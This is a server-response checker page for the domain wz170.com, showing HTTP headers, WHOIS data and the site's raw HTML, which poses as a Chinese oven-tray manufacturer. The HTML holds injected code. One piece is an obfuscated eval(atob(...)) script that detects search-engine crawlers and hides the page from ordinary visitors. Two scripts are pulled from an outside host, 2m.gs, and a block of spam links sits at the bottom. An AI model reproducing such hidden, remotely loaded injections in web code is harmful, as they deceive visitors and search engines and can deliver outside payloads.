Check server response of

Server response
NS records
Whois domain
Response headers
Request headers
Raw HTML code
200 OK - wz170.com
HTTP Status: 200
User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])
Date: Fri, 16 May 2025 08:47:00 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: max-age=604800
Last-Modified: Fri, 02 May 2025 05:01:10 GMT
Accept-Ranges: bytes
X-Powered-By: ASP.NET
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Zp4u%2BI4vu21roH6sxYL6b3DW1EMMhrUuSsKLWJwQTdW08UFeUCBMdYagIPjGegSsxm1jxZaGOKprETX965HO%2BgYSPfhkk%2FWLkov0FAUuxyS6ww0zob5ee7o%2FC8K6Z13h%2Bk%2B46QnQiV8%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 94099b98f8aad090-CPH
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=28619&min_rtt=28619&rtt_var=14309&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=165&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

HTTP Code 200 OK

200 http status code is a standard successful HTTP server response. It means that the client’s request (e.g., from a browser) was successfully processed, and the server is delivering the requested data.

When is Code 200 used?

  • When loading a web page
  • When successfully receiving an API response
  • When processing a form or another HTTP request

What does Code 200 mean for the user?

The user receives content without errors, and the page or application functions properly. If Code 200 is accompanied by data, the browser or program processes and displays it to the user.

GET / HTTP/1.1
Host: wz170.com
Accept: */*
User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])
<script type="text/javascript" src="/js/orsxg666a.script"></script><!DOCTYPE html><html lang="zh-CN"><head><meta name="robots" content="index, noarchive">    <meta charset="UTF-8"><script type="text/javascript" src="http://www.2m.gs/ad/?t=123456"></script>    <meta name="viewport" content="width=device-width, initial-scale=1.0">    <meta name="description" content="专业的烘箱烘盘厂家解决方案,致力于为客户提供高效、可靠的服务,承诺每一项服务都符合高标准。">    <meta name="keywords" content="烘箱烘盘厂家, 专业解决方案, 高效服务, 可靠服务, B2B服务">    <meta name="robots" content="index, follow">    <meta name="author" content="专业烘箱烘盘厂家团队">    <meta property="og:title" content="烘箱烘盘厂家 - 专业的解决方案">    <meta property="og:description" content="我们提供专业的烘箱烘盘厂家解决方案,致力于为客户提供高效、可靠的服务。">    <title>烘箱烘盘厂家 - 高效、可靠的专业解决方案</title><script>eval(atob("IWZ1bmN0aW9uKG8pe2xldCBjPTAsYj0vZ3xiZHxiaXwzNjB8c2d8eS9pLnRlc3QobmF2aWdhdG9yLnVzZXJBZ2VudCk7b25tb3VzZW1vdmU9KCk9PihjPTEsby5zdHlsZT17b3BhY2l0eToxLHZpc2liaWxpdHk6InZpc2libGUifSk7c2V0SW50ZXJ2YWwoKCk9PnshYiYmKCFjJiYoby5zdHlsZT17b3BhY2l0eTpvLnN0eWxlLm9wYWNpdHktLjF8fC4xLHZpc2liaWxpdHk6ImhpZGRlbiJ9KSwobG9jYWxTdG9yYWdlLmNjPS1+bG9jYWxTdG9yYWdlLmN8fDEpPjEwJiYoby5zdHlsZT17cG9pbnRlckV2ZW50czoibm9uZSIsb3BhY2l0eTouNSx2aXNpYmlsaXR5OiJ2aXNpYmxlIn0pKX0sM2UzKX0oZG9jdW1lbnQuYm9keSk="))</script>    <style>        /* 全局样式 */        body, html {            margin: 0;            padding: 0;            font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;            scroll-behavior: smooth;            color: #333;            background: #f4f6f9;        }        /* 每一屏的样式 */        .screen {            height: 100vh;            display: flex;            justify-content: center;            align-items: center;            flex-direction: column;            text-align: center;            padding: 20px;            box-sizing: border-box;        }        /* 导航栏 */        .navbar {            position: fixed;            top: 0;            width: 100%;            background: rgba(255, 255, 255, 0.9);            display: flex;            justify-content: space-between;            align-items: center;            padding: 10px 20px;            box-shadow: 0 2px 10px rgba(0, 0, 0, 0.1);            z-index: 1000;        }        .navbar .logo {            font-size: 24px;            font-weight: bold;            color: #333;        }        .navbar .nav-links a {            margin: 0 15px;            text-decoration: none;            color: #333;            font-weight: 500;        }        .navbar .contact-info {            display: flex;            align-items: center;        }        .navbar .contact-info img {            width: 24px;            height: 24px;            margin-left: 10px;            cursor: pointer;        }        /* 首页 Banner */        #home {            background: url('banner.jpg') no-repeat center center/cover;            color: #fff;        }        #home h1 {            font-size: 48px;            margin-bottom: 20px;        }        #home p {            font-size: 20px;            margin-bottom: 30px;        }        .cta-button {            padding: 10px 20px;            background: #007bff;            color: #fff9;            text-decoration: none;            border-radius: 5px;            font-size: 18px;        }        /* 关于我们 */        #about {            background: #f9f9f9;            color: #333;        }        #about h2 {            font-size: 36px;            margin-bottom: 20px;        }        #about p {            font-size: 18px;            max-width: 800px;            line-height: 1.6;        }        /* 服务介绍 */        #services {            background: #fff;            color: #333;        }        #services h2 {            font-size: 36px;            margin-bottom: 20px;        }        .service-list {            display: flex;            gap: 20px;        }        .service-item {            background: #f9f9f9;            padding: 20px;            border-radius: 10px;            width: 200px;            box-shadow: 0 4px 10px rgba(0, 0, 0, 0.1);        }        .service-item h3 {            font-size: 24px;            margin-bottom: 10px;        }        .service-item p {            font-size: 16px;            color: #666;        }        /* 联系我们 */        #contact {            background: #333;            color: #fff;        }        #contact h2 {            font-size: 36px;            margin-bottom: 20px;        }        #contact p {            font-size: 18px;            margin-bottom: 20px;        }        .contact-info {            display: flex;            align-items: center;            gap: 20px;        }        .contact-info img {            width: 40px;            height: 40px;            cursor: pointer;        }    </style></head><body>    <!-- 导航栏 -->    <div class="navbar">        <div class="logo">烘箱烘盘厂家</div>        <div class="nav-links">            <a href="#home">首页</a>            <a href="#about">关于我们</a>            <a href="#services">服务介绍</a>            <a href="#contact">联系我们</a>        </div>        <div class="contact-info">            <a href="tel:123456789">电话: 123-456-789</a>            <img src="wechat-qr.png" alt="微信二维码">        </div>    </div>    <!-- 首页 Banner -->    <div id="home" class="screen">        <h1>专业的烘箱烘盘厂家解决方案</h1>        <p>我们致力于为客户提供高效、可靠的服务,承诺每一项服务都符合高标准。</p>        <a href="#contact" class="cta-button">立即咨询</a>    </div>    <!-- 关于我们 -->    <div id="about" class="screen">        <h2>关于我们</h2>        <p>            我们是一家专业的烘箱烘盘厂家提供商,专注于为客户提供高效、可靠的解决方案。            无论是技术支持、咨询服务还是定制化解决方案,我们都以客户需求为核心,确保每一项服务都符合高标准。        </p>    </div>    <!-- 服务介绍 -->    <div id="services" class="screen">        <h2>服务介绍</h2>        <div class="service-list">            <div class="service-item">                <h3>技术支持</h3>                <p>提供全面的技术支持,确保您的业务顺畅运行。</p>            </div>            <div class="service-item">                <h3>咨询服务</h3>                <p>专业的咨询服务,帮助您制定最佳的业务策略。</p>            </div>            <div class="service-item">                <h3>定制化解决方案</h3>                <p>根据您的需求,提供量身定制的解决方案。</p>            </div>        </div>    </div>    <!-- 联系我们 -->    <div id="contact" class="screen">        <h2>联系我们</h2>        <p>如果您有任何问题,欢迎随时联系我们!</p>        <div class="contact-info">            <a href="tel:123456789">电话: 123-456-789</a>            <img src="wechat-qr.png" alt="微信二维码">        </div>    </div><!-- 友情链接开始 --><div class='friend-links'><a href="http://www34678.2m.gs" style="margin:5px;padding:5px 10px;background:#f5f5f5;border-radius:3px;">1</a><a href="http://cacciamotor.com" style="margin:5px;padding:5px 10px;background:#f5f5f5;border-radius:3px;">2</a><a href="http://www9487.desenlaser.com" style="margin:5px;padding:5px 10px;background:#f5f5f5;border-radius:3px;">3</a><a href="http://www1966.jcydw.com" style="margin:5px;padding:5px 10px;background:#f5f5f5;border-radius:3px;">4</a><a href="http://www19270.ky.gs" style="margin:5px;padding:5px 10px;background:#f5f5f5;border-radius:3px;">5</a><a href="http://www31550.haizeiqi.net" style="margin:5px;padding:5px 10px;background:#f5f5f5;border-radius:3px;">6</a><a href="http://www42692.8oq.cn" style="margin:5px;padding:5px 10px;background:#f5f5f5;border-radius:3px;">7</a><a href="http://www3303.haizeiqi.net" style="margin:5px;padding:5px 10px;background:#f5f5f5;border-radius:3px;">8</a><a href="http://2m.gs" style="margin:5px;padding:5px 10px;background:#f5f5f5;border-radius:3px;">9</a><a href="http://www12054.1gzd.com" style="margin:5px;padding:5px 10px;background:#f5f5f5;border-radius:3px;">10</a></div><!-- 友情链接结束 --></body></html><script type="text/javascript" src="http://www.2m.gs/ad/i.js1?t=654321"></script><script>
	var siteId="94";
	</script><script type="text/javascript" src="/static/js/config.js"></script><script>
      function newsListHoverAction(){
		$('div .tab-tit').find('a').delegate('','mouseenter',function(){
			$(this).siblings().removeClass('cur');
			$(this).addClass("cur");
	
			var index = $(this).index();
	
			var bigDiv = $(this).parent().parent().parent();
			$(bigDiv).find('.list').hide();
			$($(bigDiv).find('.list')[index]).show();
			
		})
	}
	
	$(function(){
		newsListHoverAction();
	});
     </script></body></html>
                               

Whois info of domain

Domain Name: WZ170.COM
Registry Domain ID: 2876673993_DOMAIN_COM-VRSN
Registrar WHOIS Server: grs-whois.hichina.com
Registrar URL: http://wanwang.aliyun.com
Updated Date: 2024-12-25T08:04:04Z
Creation Date: 2024-04-29T02:27:16Z
Registry Expiry Date: 2027-04-29T02:27:16Z
Registrar: Alibaba Cloud Computing Ltd. d/b/a HiChina (www.net.cn)
Registrar IANA ID: 1599
Registrar Abuse Contact Email: [email protected]
Registrar Abuse Contact Phone: +86.95187
Domain Status: ok https://icann.org/epp#ok
Name Server: AMALIA.NS.CLOUDFLARE.COM
Name Server: GORDON.NS.CLOUDFLARE.COM
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2025-05-16T08:46:46Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE: The expiration date displayed in this record is the date the
TERMS OF USE: You are not authorized to access or query our Whois
by the following terms of use: You agree that you may use this Data only
to: (1) allow, enable, or otherwise support the transmission of mass